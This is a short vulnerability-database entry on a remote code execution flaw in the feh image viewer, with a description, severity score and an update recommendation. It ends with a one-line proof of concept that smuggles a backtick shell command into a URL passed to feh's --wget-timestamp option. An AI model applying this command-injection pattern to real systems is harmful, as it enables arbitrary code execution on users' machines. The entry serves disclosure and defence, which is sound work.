header-logo
Suggest Exploit
vendor:
feh
by:
7.5
CVSS
HIGH
Remote Code Execution
CWE
Product Name: feh
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

feh Remote Code Execution Vulnerability

Attackers can exploit this issue to execute arbitrary code in the context of the user running the application. Successful exploits will compromise the application and possibly the computer.

Mitigation:

Update to the latest version of feh to fix this vulnerability.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/41161/info

feh is prone to a remote code-execution vulnerability.

Attackers can exploit this issue to execute arbitrary code in the context of the user running the application. Successful exploits will compromise the application and possibly the computer. 

feh --wget-timestamp 'http://www.example.com/stuff/bar`touch lol_hax`.jpg'

Navigation

Suggest Exploit

Services By CQR